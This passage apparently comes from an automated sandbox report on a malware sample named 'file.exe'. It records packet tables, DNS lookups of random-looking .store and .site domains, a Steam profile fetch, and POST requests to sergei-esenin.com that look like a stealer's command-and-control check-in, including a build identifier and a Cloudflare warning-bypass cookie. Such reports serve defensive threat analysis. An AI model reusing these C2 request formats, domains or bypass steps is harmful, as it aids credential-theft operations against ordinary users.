                                                                                                                      Oct 14, 2024 01:00:23.196070910 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.196082115 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:23.196082115 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:23.196100950 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:23.196118116 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:23.323560953 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.323633909 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.323697090 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:23.323718071 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.323759079 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:23.323774099 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:23.330473900 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.330544949 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:23.330560923 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.330575943 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.330601931 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:23.330630064 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:23.331429005 CEST49704443192.168.2.7104.102.49.254
                                                                                                                      Oct 14, 2024 01:00:23.331446886 CEST44349704104.102.49.254192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.369856119 CEST49715443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:23.369891882 CEST44349715172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.370004892 CEST49715443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:23.370318890 CEST49715443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:23.370337009 CEST44349715172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.859189034 CEST44349715172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.859273911 CEST49715443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:23.861907959 CEST49715443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:23.861913919 CEST44349715172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.862152100 CEST44349715172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.863322020 CEST49715443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:23.863373995 CEST49715443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:23.863406897 CEST44349715172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.975382090 CEST44349715172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.975552082 CEST44349715172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.975605011 CEST49715443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:23.975620985 CEST44349715172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.975703955 CEST44349715172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.975754976 CEST49715443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:23.975766897 CEST44349715172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.975879908 CEST44349715172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.975931883 CEST49715443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:23.978552103 CEST49715443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:23.978552103 CEST49715443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:23.978566885 CEST44349715172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.978580952 CEST44349715172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:24.233613014 CEST49721443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:24.233664989 CEST44349721172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:24.233751059 CEST49721443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:24.233972073 CEST49721443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:24.233992100 CEST44349721172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:24.700139046 CEST44349721172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:24.700206041 CEST49721443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:24.701411009 CEST49721443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:24.701425076 CEST44349721172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:24.701654911 CEST44349721172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:24.702876091 CEST49721443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:24.702904940 CEST49721443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:24.702950001 CEST44349721172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:25.168373108 CEST44349721172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:25.168615103 CEST44349721172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:25.168762922 CEST49721443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:25.168792963 CEST49721443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:25.168807030 CEST44349721172.67.206.204192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:25.168821096 CEST49721443192.168.2.7172.67.206.204
                                                                                                                      Oct 14, 2024 01:00:25.168824911 CEST44349721172.67.206.204192.168.2.7

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Oct 14, 2024 01:00:21.629425049 CEST5587953192.168.2.71.1.1.1
                                                                                                                      Oct 14, 2024 01:00:21.642261982 CEST53558791.1.1.1192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:21.647977114 CEST5623953192.168.2.71.1.1.1
                                                                                                                      Oct 14, 2024 01:00:21.657144070 CEST53562391.1.1.1192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:21.658746958 CEST5536453192.168.2.71.1.1.1
                                                                                                                      Oct 14, 2024 01:00:21.667206049 CEST53553641.1.1.1192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:21.668647051 CEST5208453192.168.2.71.1.1.1
                                                                                                                      Oct 14, 2024 01:00:21.677128077 CEST53520841.1.1.1192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:21.679812908 CEST5458153192.168.2.71.1.1.1
                                                                                                                      Oct 14, 2024 01:00:21.688076973 CEST53545811.1.1.1192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:21.690872908 CEST6266553192.168.2.71.1.1.1
                                                                                                                      Oct 14, 2024 01:00:21.699471951 CEST53626651.1.1.1192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:21.702075005 CEST5305953192.168.2.71.1.1.1
                                                                                                                      Oct 14, 2024 01:00:21.710585117 CEST53530591.1.1.1192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:21.713054895 CEST5953553192.168.2.71.1.1.1
                                                                                                                      Oct 14, 2024 01:00:21.721764088 CEST53595351.1.1.1192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:21.727055073 CEST5580253192.168.2.71.1.1.1
                                                                                                                      Oct 14, 2024 01:00:21.733982086 CEST53558021.1.1.1192.168.2.7
                                                                                                                      Oct 14, 2024 01:00:23.356122971 CEST4978453192.168.2.71.1.1.1
                                                                                                                      Oct 14, 2024 01:00:23.368879080 CEST53497841.1.1.1192.168.2.7

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Oct 14, 2024 01:00:21.629425049 CEST192.168.2.71.1.1.10xb0bbStandard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.647977114 CEST192.168.2.71.1.1.10xc711Standard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.658746958 CEST192.168.2.71.1.1.10xdfc3Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.668647051 CEST192.168.2.71.1.1.10x960cStandard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.679812908 CEST192.168.2.71.1.1.10x5fd2Standard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.690872908 CEST192.168.2.71.1.1.10x839Standard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.702075005 CEST192.168.2.71.1.1.10x738bStandard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.713054895 CEST192.168.2.71.1.1.10x56ffStandard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.727055073 CEST192.168.2.71.1.1.10x1e41Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:23.356122971 CEST192.168.2.71.1.1.10xfb24Standard query (0)sergei-esenin.comA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Oct 14, 2024 01:00:21.642261982 CEST1.1.1.1192.168.2.70xb0bbName error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.657144070 CEST1.1.1.1192.168.2.70xc711Name error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.667206049 CEST1.1.1.1192.168.2.70xdfc3Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.677128077 CEST1.1.1.1192.168.2.70x960cName error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.688076973 CEST1.1.1.1192.168.2.70x5fd2Name error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.699471951 CEST1.1.1.1192.168.2.70x839Name error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.710585117 CEST1.1.1.1192.168.2.70x738bName error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.721764088 CEST1.1.1.1192.168.2.70x56ffName error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:21.733982086 CEST1.1.1.1192.168.2.70x1e41No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:23.368879080 CEST1.1.1.1192.168.2.70xfb24No error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                                                                      Oct 14, 2024 01:00:23.368879080 CEST1.1.1.1192.168.2.70xfb24No error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • steamcommunity.com
                                                                                                                      • sergei-esenin.com

                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.749704104.102.49.2544437364C:\Users\user\Desktop\file.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-10-13 23:00:22 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Host: steamcommunity.com
                                                                                                                      2024-10-13 23:00:23 UTC1870INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Date: Sun, 13 Oct 2024 23:00:23 GMT
                                                                                                                      Content-Length: 34837
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: sessionid=58872c358a22b992a1a0cbb4; Path=/; Secure; SameSite=None
                                                                                                                      Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                      2024-10-13 23:00:23 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                      2024-10-13 23:00:23 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                      Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                      2024-10-13 23:00:23 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                      Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                      2024-10-13 23:00:23 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.749715172.67.206.2044437364C:\Users\user\Desktop\file.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-10-13 23:00:23 UTC264OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 8
                                                                                                                      Host: sergei-esenin.com
                                                                                                                      2024-10-13 23:00:23 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                      Data Ascii: act=life
                                                                                                                      2024-10-13 23:00:23 UTC551INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 13 Oct 2024 23:00:23 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WGe7OC%2B8uh7gmQBgFE4LuZGc7TcV8ZVrFylfBT832NHrBOdBPaqvsg0MbJu7jSUdixUvrEkPj%2FiFQzHyCsJPxI00qrQyg20XIDgFBR4LF7WTIcB0hNAfFcKV76QlLSSz4EAW8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8d22f2118f49c47c-EWR
                                                                                                                      2024-10-13 23:00:23 UTC818INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                      Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                      2024-10-13 23:00:23 UTC1369INData Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b
                                                                                                                      Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
                                                                                                                      2024-10-13 23:00:23 UTC1369INData Raw: 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74
                                                                                                                      Data Ascii: ent/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input
                                                                                                                      2024-10-13 23:00:23 UTC885INData Raw: 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64
                                                                                                                      Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand
                                                                                                                      2024-10-13 23:00:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.749721172.67.206.2044437364C:\Users\user\Desktop\file.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-10-13 23:00:24 UTC354OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Cookie: __cf_mw_byp=K6lOIIoT178VADmpH2iwMP7nsotQSL75jipN8qhG5Ck-1728860423-0.0.1.1-/api
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 52
                                                                                                                      Host: sergei-esenin.com
                                                                                                                      2024-10-13 23:00:24 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                                                      2024-10-13 23:00:25 UTC829INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 13 Oct 2024 23:00:25 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=mibnsf1b6k8u51tmp9f7k3bjtl; expires=Thu, 06 Feb 2025 16:47:03 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
